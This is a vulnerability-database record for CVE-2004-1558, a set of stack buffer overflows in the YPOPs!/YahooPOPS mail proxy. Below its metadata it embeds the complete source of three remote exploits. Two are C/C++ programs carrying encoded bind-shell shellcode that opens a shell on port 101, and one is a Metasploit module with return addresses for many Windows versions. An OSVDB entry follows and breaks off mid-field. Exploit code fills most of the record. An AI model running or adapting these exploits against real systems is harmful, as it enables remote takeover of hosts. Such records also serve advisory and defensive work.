ID CVE-2004-1558Type cveReporter cve@mitre.orgModified 2017-07-11T01:31:00
Description
Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request.
{"id": "CVE-2004-1558", "bulletinFamily": "NVD", "title": "CVE-2004-1558", "description": "Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request.", "published": "2004-12-31T05:00:00", "modified": "2017-07-11T01:31:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1558", "reporter": "cve@mitre.org", "references": ["http://www.osvdb.org/10367", "http://dbeusee.home.comcast.net/history.html", "http://www.attrition.org/pipermail/vim/2006-October/001089.html", "http://marc.info/?l=bugtraq&m=109630699829536&w=2", "http://www.osvdb.org/10366", "http://securitytracker.com/alerts/2004/Sep/1011426.html", "http://www.securityfocus.com/bid/11256", "https://exchange.xforce.ibmcloud.com/vulnerabilities/17518", "https://exchange.xforce.ibmcloud.com/vulnerabilities/17515", "http://www.hat-squad.com/en/000075.html", "http://secunia.com/advisories/12660"], "cvelist": ["CVE-2004-1558"], "type": "cve", "lastseen": "2019-05-29T18:08:03", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "be01643f40668a3d5b69341226d0a175"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "42323b16f6040423ee56a5334f3d479b"}, {"key": "cpe23", "hash": "ce2ee125e2ebb5d65e687f19b13c7f32"}, {"key": "cvelist", "hash": "6b920611c95caa1616e98cd0307531c1"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "a11071654cde664199dac48330e1f990"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "b87f05f0eab180f625782ee6756a783b"}, {"key": "href", "hash": "5ca4765b5df8ab087a6aed0bcfaf050b"}, {"key": "modified", "hash": "523ab2b584257b356b93ab54fd2d1554"}, {"key": "published", "hash": "3f051342f862f2833e883053d29ea929"}, {"key": "references", "hash": "edfcf5700fdd494cb881baa8c25cee6d"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "110f028f15e5ec8901cff599f3ba4b8d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b40e19fa2d0e4a2fb8ab8d221075990783ade2bb7a04a6107c91a7b8d6035ad1", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:577", "EDB-ID:582", "EDB-ID:16818"]}, {"type": "osvdb", "idList": ["OSVDB:10366", "OSVDB:10367"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83157"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMTP/YPOPS_OVERFLOW1"]}], "modified": "2019-05-29T18:08:03"}, "score": {"value": 8.1, "vector": "NONE", "modified": "2019-05-29T18:08:03"}, "vulnersScore": 8.1}, "objectVersion": "1.3", "cpe": ["cpe:/a:ypops:ypops:0.4.1", "cpe:/a:ypops:ypops:0.4", "cpe:/a:ypops:ypops:0.5", "cpe:/a:ypops:ypops:0.4.3", "cpe:/a:ypops:ypops:0.6", "cpe:/a:ypops:ypops:0.4.6", "cpe:/a:ypops:ypops:0.4.4", "cpe:/a:ypops:ypops:0.4.5", "cpe:/a:ypops:ypops:0.4.2"], "affectedSoftware": [{"name": "ypops ypops", "operator": "eq", "version": "0.4.1"}, {"name": "ypops ypops", "operator": "eq", "version": "0.4.3"}, {"name": "ypops ypops", "operator": "eq", "version": "0.6"}, {"name": "ypops ypops", "operator": "eq", "version": "0.4.5"}, {"name": "ypops ypops", "operator": "eq", "version": "0.4.4"}, {"name": "ypops ypops", "operator": "eq", "version": "0.5"}, {"name": "ypops ypops", "operator": "eq", "version": "0.4"}, {"name": "ypops ypops", "operator": "eq", "version": "0.4.6"}, {"name": "ypops ypops", "operator": "eq", "version": "0.4.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": true, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:ypops:ypops:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ypops:ypops:0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ypops:ypops:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ypops:ypops:0.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:ypops:ypops:0.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:ypops:ypops:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:ypops:ypops:0.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:ypops:ypops:0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ypops:ypops:0.4.6:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}
{"exploitdb": [{"lastseen": "2016-01-31T12:28:49", "bulletinFamily": "exploit", "description": "YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit. CVE-2004-1558. Remote exploit for windows platform", "modified": "2004-10-15T00:00:00", "published": "2004-10-15T00:00:00", "id": "EDB-ID:577", "href": "https://www.exploit-db.com/exploits/577/", "type": "exploitdb", "title": "YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit", "sourceData": "/*\r\n\r\nYahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1\r\nExploit code by class101 [at] DFind.kd-team.com \r\nBind a shellcode to the port 101.\r\n\r\nThanx to Behrang Fouladi(behrang@hat-squad.com) for the bug discovery\r\nThanx to HDMoore and Metasploit.com for their kickass ASM work\r\n\r\nInstead of to move like you Behrang EBX to ESP after overwritting EIP, \r\nI found out that only jumping to EBX is needed because our crafted payload \r\nstarts at EBX.\r\n\r\nThe exploit is tested working on Win2K SP4 and WinXP SP1, and it should works \r\nalso on NT4 and 2003 as the shellcode is designed for.\r\n\r\nThe jmp esp is from libcurl.dll wich come with yahoopops, just to notice there is no need of an offset update, \r\nthis is already \"universal\".\r\n\r\nThis exploit can't overflow the port 110 (POP3), not enough space in the buffer to add a bind/reverse shell\r\nmaybe enough to spawn only one as the well know KaHT.\r\nIf you want to try on POP3, you should request more than 180 bytes to overwrite EAX and ECX\r\nMaybe in a v0.2, I will add it , anyway check http://DFind.kd-team.com regulary.\r\n\r\n*/\r\n\r\n#include \"winsock2.h\"\r\n#include \"fstream.h\"\r\n\r\n#pragma comment(lib, \"ws2_32\")\r\n\r\nchar scode[] = //BIND shellcode port 101, thanx HDMoore. \r\n\"\\xEB\"\r\n\"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\r\n\"\\xFF\\x60\\xDE\\x88\\x88\\x88\\xDB\\xDD\\xDE\\xDF\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\"\r\n\"\\xF0\\x89\\x62\\x03\\xC2\\x90\\x03\\xD2\\xA8\\x89\\x63\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x89\\x66\\xB9\"\r\n\"\\x77\\x74\\xB9\\x48\\x24\\xB0\\x68\\xFC\\x8F\\x49\\x47\\x85\\x89\\x4F\\x63\\x7A\\xB3\\xF4\\xAC\\x9C\"\r\n\"\\xFD\\x69\\x03\\xD2\\xAC\\x89\\x63\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\\x89\\x63\\x03\\x8C\\x03\\x89\"\r\n\"\\x60\\x63\\x8A\\xB9\\x48\\xD7\\xD6\\xD5\\xD3\\x4A\\x80\\x88\\xD6\\xE2\\xB8\\xD1\\xEC\\x03\\x91\\x03\"\r\n\"\\xD3\\x84\\x03\\xD3\\x94\\x03\\x93\\x03\\xD3\\x80\\xDB\\xE0\\x06\\xC6\\x86\\x64\\x77\\x5E\\x01\\x4F\"\r\n\"\\x09\\x64\\x88\\x89\\x88\\x88\\xDF\\xDE\\xDB\\x01\\x6D\\x60\\xAF\\x88\\x88\\x88\\x18\\x89\\x88\\x88\"\r\n\"\\x3E\\x91\\x90\\x6F\\x2C\\x91\\xF8\\x61\\x6D\\xC1\\x0E\\xC1\\x2C\\x92\\xF8\\x4F\\x2C\\x25\\xA6\\x61\"\r\n\"\\x51\\x81\\x7D\\x25\\x43\\x65\\x74\\xB3\\xDF\\xDB\\xBA\\xD7\\xBB\\xBA\\x88\\xD3\\x05\\xC3\\xA8\\xD9\"\r\n\"\\x77\\x5F\\x01\\x57\\x01\\x4B\\x05\\xFD\\x9C\\xE2\\x8F\\xD1\\xD9\\xDB\\x77\\xBC\\x07\\x77\\xDD\\x8C\"\r\n\"\\xD1\\x01\\x8C\\x06\\x6A\\x7A\\xA3\\xAF\\xDC\\x77\\xBF\\x77\\xDD\\xB8\\xB9\\x48\\xD8\\xD8\\xD8\\xD8\"\r\n\"\\xC8\\xD8\\xC8\\xD8\\x77\\xDD\\xA4\\x01\\x4F\\xB9\\x53\\xDB\\xDB\\xE0\\x8A\\x88\\x88\\xED\\x01\\x68\"\r\n\"\\xE2\\x98\\xD8\\xDF\\x77\\xDD\\xAC\\xDB\\xDF\\x77\\xDD\\xA0\\xDB\\xDC\\xDF\\x77\\xDD\\xA8\\x01\\x4F\"\r\n\"\\xE0\\xCB\\xC5\\xCC\\x88\\x01\\x6B\\x0F\\x72\\xB9\\x48\\x05\\xF4\\xAC\\x24\\xE2\\x9D\\xD1\\x7B\\x23\"\r\n\"\\x0F\\x72\\x09\\x64\\xDC\\x88\\x88\\x88\\x4E\\xCC\\xAC\\x98\\xCC\\xEE\\x4F\\xCC\\xAC\\xB4\\x89\\x89\"\r\n\"\\x01\\xF4\\xAC\\xC0\\x01\\xF4\\xAC\\xC4\\x01\\xF4\\xAC\\xD8\\x05\\xCC\\xAC\\x98\\xDC\\xD8\\xD9\\xD9\"\r\n\"\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\xDB\\xD9\\x77\\xFD\\x88\\xE0\\xFA\\x76\\x3B\\x9E\\x77\\xDD\\x8C\\x77\"\r\n\"\\x58\\x01\\x6E\\x77\\xFD\\x88\\xE0\\x25\\x51\\x8D\\x46\\x77\\xDD\\x8C\\x01\\x4B\\xE0\\x77\\x77\\x77\"\r\n\"\\x77\\x77\\xBE\\x77\\x5B\\x77\\xFD\\x88\\xE0\\xF6\\x50\\x6A\\xFB\\x77\\xDD\\x8C\\xB9\\x53\\xDB\\x77\"\r\n\"\\x58\\x68\\x61\\x63\\x6B\\x90\";\r\n\r\nstatic char payload[1024];\r\n\r\nchar jmp[]=\"\\x23\\x9b\\x02\\x10\"; //JMP ESP\r\nchar jmpebx[]=\"\\xff\\xe3\"; //JMP EBX\r\n\r\nvoid usage(char* us);\r\nWSADATA wsadata;\r\nvoid ver();\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n\tver();\r\n\tif ((argc<2)||(argc>3)){usage(argv[0]);return -1;}\r\n\tif (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<\"[+] wsastartup error: \"<<WSAGetLastError()<<endl;return -1;}\r\n\tchar recvbuf[100];\r\n\tint ip=htonl(inet_addr(argv[1])), port, size, x;\r\n\tif (argc==3){port=atoi(argv[2]);}\r\n\telse port=25;\r\n\tSOCKET s;\r\n\tstruct fd_set mask;\r\n\tstruct timeval timeout; \r\n\tstruct sockaddr_in server;\r\n\ts=socket(AF_INET,SOCK_STREAM,0);\r\n\tif (s==INVALID_SOCKET){ cout<<\"[+] socket() error: \"<<WSAGetLastError()<<endl;WSACleanup();return -1;}\r\n\tserver.sin_family=AF_INET;\r\n\tserver.sin_addr.s_addr=htonl(ip);\r\n\tserver.sin_port=htons(port);\r\n\tWSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);\r\n\ttimeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);\r\n\tswitch(select(s+1,NULL,&mask,NULL,&timeout))\r\n\t{\r\n\t\tcase -1: {cout<<\"[+] select() error: \"<<WSAGetLastError()<<endl;closesocket(s);return -1;}\r\n\t\tcase 0: {cout<<\"[+] connect() error: \"<<WSAGetLastError()<<endl;closesocket(s);return -1;}\r\n\t\tdefault:\r\n\t\tif(FD_ISSET(s,&mask))\r\n\t\t{\r\n\t\t\tcout<<\"[+] connected, checking the server...\"<<endl;\r\n\t\t\tSleep(1000);recv(s,recvbuf,200,0);\r\n\t\t\tif (strstr(recvbuf,\"OK POP3 YahooPOPs\")){cout<<\"[+] this is not the POP3 port but the SMTP port that you should use.\"<<endl;return -1;}\r\n\t\t\tif (!strstr(recvbuf,\"220 YahooPOPs\")){cout<<\"[+] this is not a YahooPOPS server, quitting...\"<<endl;return -1;}\r\n\t\t\tcout<<\"[+] YahooPOPS SMTP detected, constructing the payload\"<<endl;\r\n\t\t\tsize=508-sizeof(scode);\r\n\t\t\tmemset(payload,0,sizeof(payload));\r\n\t\t\tfor (x=0;x<size;x++){strcat(payload,\"\\x90\");}\r\n\t\t\tstrcat(payload,scode);strcat(payload,jmp);strcat(payload,jmpebx);\r\n\t\t if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<\"[+] sending error, the server prolly rebooted.\"<<endl;return -1;}\r\n\t\t\tcout<<\"[+] payload send, connect the port 101 to get a shell.\"<<endl;\r\n\t\t\treturn 0;\r\n\t\t}\r\n\t}\r\n\tclosesocket(s);\r\n\tWSACleanup();\r\n\treturn 0;\r\n}\r\n\r\n\r\nvoid usage(char* us) \r\n{ \r\n\tcout<<\"USAGE: 101_ypops.exe ip port\\n\"<<endl;\r\n\tcout<<\"NOTE: The port should be the SMTP, not POP3!\"<<endl;\r\n\tcout<<\" The port 25 is default if no port specified.\"<<endl;\r\n\tcout<<\" The exploit bind a shellcode to the port 101.\"<<endl;\r\n\treturn;\r\n} \r\n\r\nvoid ver()\r\n{\t\r\ncout<<endl;\r\ncout<<\" \"<<endl;\r\ncout<<\" ===================================================[v0.1]===\"<<endl;\r\ncout<<\" ===YahooPOPS <= v1.6, SMTP Remote Buffer Overflow Exploit===\"<<endl;\r\ncout<<\" =====coded by class101===========[DFind.kd-team.com 2004]===\"<<endl;\r\ncout<<\" ============================================================\"<<endl;\r\ncout<<\" \"<<endl;\r\n}\n\n// milw0rm.com [2004-10-15]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/577/"}, {"lastseen": "2016-01-31T12:29:34", "bulletinFamily": "exploit", "description": "YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit. CVE-2004-1558. Remote exploit for windows platform", "modified": "2004-10-18T00:00:00", "published": "2004-10-18T00:00:00", "id": "EDB-ID:582", "href": "https://www.exploit-db.com/exploits/582/", "type": "exploitdb", "title": "YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit", "sourceData": "//Diabolic Crab's exploit for YahooPOPs <= 1.6 SMTP\r\n//dcrab@hackerscenter.com\r\n//www.hackerscenter.com\r\n//For more work check out, http://icis.digitalparadox.org\r\n//This was done at 4 am so escuse the messy code if any\r\n//Good job class101 on the windows version ;)\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n\r\nchar scode[] = //Bind shell on port 101, taken from the windows exploit by class101\r\n\"\\xEB\"\r\n\"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\r\n\"\\xFF\\x60\\xDE\\x88\\x88\\x88\\xDB\\xDD\\xDE\\xDF\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\"\r\n\"\\xF0\\x89\\x62\\x03\\xC2\\x90\\x03\\xD2\\xA8\\x89\\x63\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x89\\x66\\xB9\"\r\n\"\\x77\\x74\\xB9\\x48\\x24\\xB0\\x68\\xFC\\x8F\\x49\\x47\\x85\\x89\\x4F\\x63\\x7A\\xB3\\xF4\\xAC\\x9C\"\r\n\"\\xFD\\x69\\x03\\xD2\\xAC\\x89\\x63\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\\x89\\x63\\x03\\x8C\\x03\\x89\"\r\n\"\\x60\\x63\\x8A\\xB9\\x48\\xD7\\xD6\\xD5\\xD3\\x4A\\x80\\x88\\xD6\\xE2\\xB8\\xD1\\xEC\\x03\\x91\\x03\"\r\n\"\\xD3\\x84\\x03\\xD3\\x94\\x03\\x93\\x03\\xD3\\x80\\xDB\\xE0\\x06\\xC6\\x86\\x64\\x77\\x5E\\x01\\x4F\"\r\n\"\\x09\\x64\\x88\\x89\\x88\\x88\\xDF\\xDE\\xDB\\x01\\x6D\\x60\\xAF\\x88\\x88\\x88\\x18\\x89\\x88\\x88\"\r\n\"\\x3E\\x91\\x90\\x6F\\x2C\\x91\\xF8\\x61\\x6D\\xC1\\x0E\\xC1\\x2C\\x92\\xF8\\x4F\\x2C\\x25\\xA6\\x61\"\r\n\"\\x51\\x81\\x7D\\x25\\x43\\x65\\x74\\xB3\\xDF\\xDB\\xBA\\xD7\\xBB\\xBA\\x88\\xD3\\x05\\xC3\\xA8\\xD9\"\r\n\"\\x77\\x5F\\x01\\x57\\x01\\x4B\\x05\\xFD\\x9C\\xE2\\x8F\\xD1\\xD9\\xDB\\x77\\xBC\\x07\\x77\\xDD\\x8C\"\r\n\"\\xD1\\x01\\x8C\\x06\\x6A\\x7A\\xA3\\xAF\\xDC\\x77\\xBF\\x77\\xDD\\xB8\\xB9\\x48\\xD8\\xD8\\xD8\\xD8\"\r\n\"\\xC8\\xD8\\xC8\\xD8\\x77\\xDD\\xA4\\x01\\x4F\\xB9\\x53\\xDB\\xDB\\xE0\\x8A\\x88\\x88\\xED\\x01\\x68\"\r\n\"\\xE2\\x98\\xD8\\xDF\\x77\\xDD\\xAC\\xDB\\xDF\\x77\\xDD\\xA0\\xDB\\xDC\\xDF\\x77\\xDD\\xA8\\x01\\x4F\"\r\n\"\\xE0\\xCB\\xC5\\xCC\\x88\\x01\\x6B\\x0F\\x72\\xB9\\x48\\x05\\xF4\\xAC\\x24\\xE2\\x9D\\xD1\\x7B\\x23\"\r\n\"\\x0F\\x72\\x09\\x64\\xDC\\x88\\x88\\x88\\x4E\\xCC\\xAC\\x98\\xCC\\xEE\\x4F\\xCC\\xAC\\xB4\\x89\\x89\"\r\n\"\\x01\\xF4\\xAC\\xC0\\x01\\xF4\\xAC\\xC4\\x01\\xF4\\xAC\\xD8\\x05\\xCC\\xAC\\x98\\xDC\\xD8\\xD9\\xD9\"\r\n\"\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\xDB\\xD9\\x77\\xFD\\x88\\xE0\\xFA\\x76\\x3B\\x9E\\x77\\xDD\\x8C\\x77\"\r\n\"\\x58\\x01\\x6E\\x77\\xFD\\x88\\xE0\\x25\\x51\\x8D\\x46\\x77\\xDD\\x8C\\x01\\x4B\\xE0\\x77\\x77\\x77\"\r\n\"\\x77\\x77\\xBE\\x77\\x5B\\x77\\xFD\\x88\\xE0\\xF6\\x50\\x6A\\xFB\\x77\\xDD\\x8C\\xB9\\x53\\xDB\\x77\"\r\n\"\\x58\\x68\\x61\\x63\\x6B\\x90\";\r\n\r\nstatic char payload[1024];\r\n\r\nchar jmp[]=\"\\x23\\x9b\\x02\\x10\"; //JMP ESP\r\nchar jmpebx[]=\"\\xff\\xe3\"; //JMP EBX\r\n\r\nvoid usage(char* us);\r\nvoid ver();\r\n\r\n int main(int argc, char *argv[])\r\n {\r\n ver();\r\n char grab[999];\r\n int sock;\r\n if (argc<4){\r\n usage(argv[0]);return -1;\r\n }\r\n int ip=htonl(inet_addr(argv[1])), port, size, x;\r\n if (argc==3){port=atoi(argv[2]);}\r\n else port=25;\r\n struct hostent *aap;\r\n struct sockaddr_in addr;\r\n if((aap=(struct hostent *)gethostbyname(argv[1]))==NULL) {\r\n perror(\"Gethostbyname()\");\r\n exit(1); }\r\n if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {\r\n perror(\"Socket()\");\r\n exit(1); }\r\n addr.sin_family=AF_INET;\r\n addr.sin_port=htons(port);\r\n memcpy((char *)&addr.sin_addr,(char *)aap->h_addr,aap->h_length);\r\n if(connect(sock,(struct sockaddr *)&addr,sizeof(addr))!=0) {\r\n perror(\"Connect()\");\r\n exit(0); }\r\n printf (\"[+] Connected\\n\");\r\n fflush(stdin);\r\n sleep(2);\r\n read(sock,grab,200);\r\n printf (\"[+] Reading Banner\\n\");\r\n if (!strstr(grab,\"220 YahooPOPs\")) {\r\n printf(\"[+] this is not a YahooPOPS server, quitting...\\n\");\r\n return -1; }\r\n printf (\"[+] Found YahooPOP's Server\\n\");\r\n size=508-sizeof(scode);\r\n memset(payload,0,sizeof(payload));\r\n for (x=0;x<size;x++){strcat(payload,\"\\x90\");}\r\n \r\nstrcat(payload,scode);strcat(payload,jmp);strcat(payload,jmpebx);\r\n printf (\"[+] Sending Shellcode\\n\");\r\n if (send(sock, payload, strlen(payload), 0) < 0) {\r\n perror(\"Send()\");\r\n exit(0); }\r\n printf (\"[+] Sleep for 3 seconds\\n\");\r\n sleep(3);\r\n char hack[100];\r\n sprintf (hack, \"telnet %s 101\", argv[1]);\r\n system (hack);\r\n return 0;\r\n }\r\n\r\nvoid usage(char* us)\r\n{\r\n printf(\"Usage: ./dc_ypop ip port\\n\");\r\n printf(\"The exploit binds a shell to the port 101.\\n\");\r\n return;\r\n}\r\n\r\nvoid ver()\r\n{\r\n printf (\"################################################################\\n\");\r\n printf (\"# Diabolic Crab's Bind Shell Exploit for YahooPOPS <= 1.6 SMTP #\\n\");\r\n printf (\"# dcrab@hackerscenter.com www.hackerscenter.com #\\n\");\r\n printf (\"# Credits to Behrang Fouladi for finding this bug #\\n\");\r\n printf (\"################################################################\\n\");\r\n}\n\n// milw0rm.com [2004-10-18]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/582/"}, {"lastseen": "2016-02-02T06:34:53", "bulletinFamily": "exploit", "description": "YPOPS 0.6 Buffer Overflow. CVE-2004-1558. Remote exploit for windows platform", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "EDB-ID:16818", "href": "https://www.exploit-db.com/exploits/16818/", "type": "exploitdb", "title": "YPOPS 0.6 - Buffer Overflow", "sourceData": "##\r\n# $Id: ypops_overflow1.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Smtp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'YPOPS 0.6 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the YPOPS POP3\r\n\t\t\t\tservice.\r\n\r\n\t\t\t\tThis is a classic stack buffer overflow for YPOPS version 0.6.\r\n\t\t\t\tPossibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\r\n\t\t\t\tjmp ebx opcode in ws_32.dll\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'acaro <acaro@jervus.it>' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2004-1558'],\r\n\t\t\t\t\t[ 'OSVDB', '10367'],\r\n\t\t\t\t\t[ 'BID', '11256'],\r\n\t\t\t\t\t[ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],\r\n\t\t\t\t],\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1200,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x25\",\r\n\t\t\t\t\t'MinNops' => 106,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 SP0 Italian', { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows 2000 SP0 English', { 'Ret' => 0x75036113, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows 2000 SP1 English', { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows 2000 SP2 English', { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows 2000 SP3 English', { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows 2000 SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows XP SP2 English', { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows 2003 SP0 English', { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],\r\n\t\t\t\t\t[ 'Windows 2003 SP1 English', { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Sep 27 2004'))\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\r\n\t\tbanner.gsub!(/\\n/, '')\r\n\r\n\t\tif banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/\r\n\t\t\tprint_status(\"Vulnerable SMTP server: #{banner}\")\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\r\n\t\tprint_status(\"Unknown SMTP server: #{banner}\")\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tpattern =\r\n\t\t\trand_text_alpha(target['Offset'] - payload.encoded.length) +\r\n\t\t\tpayload.encoded +\r\n\t\t\t[target.ret].pack('V') +\r\n\t\t\t\"\\n\"\r\n\r\n\t\tprint_status(\"Trying #{target.name} using jmp ebx at #{\"0x%.8x\" % target.ret}\")\r\n\r\n\t\tsock.put(pattern)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16818/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:05", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in YPOPS!. YPOPS! fails to validate input on SMTP requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in YPOPS!. YPOPS! fails to validate input on SMTP requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://yahoopops.sourceforge.net/\n[Secunia Advisory ID:12660](https://secuniaresearch.flexerasoftware.com/advisories/12660/)\n[Related OSVDB ID: 10366](https://vulners.com/osvdb/OSVDB:10366)\nOther Advisory URL: http://www.hat-squad.com/en/000075.html\nMail List Post: http://attrition.org/pipermail/vim/2006-October/001089.html\nISS X-Force ID: 17518\nGeneric Exploit URL: http://www.securiteam.com/exploits/6O00G20BGY.html\nGeneric Exploit URL: http://www.securiteam.com/exploits/6C00E2ABFU.html\n[CVE-2004-1558](https://vulners.com/cve/CVE-2004-1558)\n", "modified": "2004-09-27T00:00:00", "published": "2004-09-27T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:10367", "id": "OSVDB:10367", "type": "osvdb", "title": "YahooPOPS SMTP Service Remote Overflow", "cvss": {"score": 7.5, "vector": 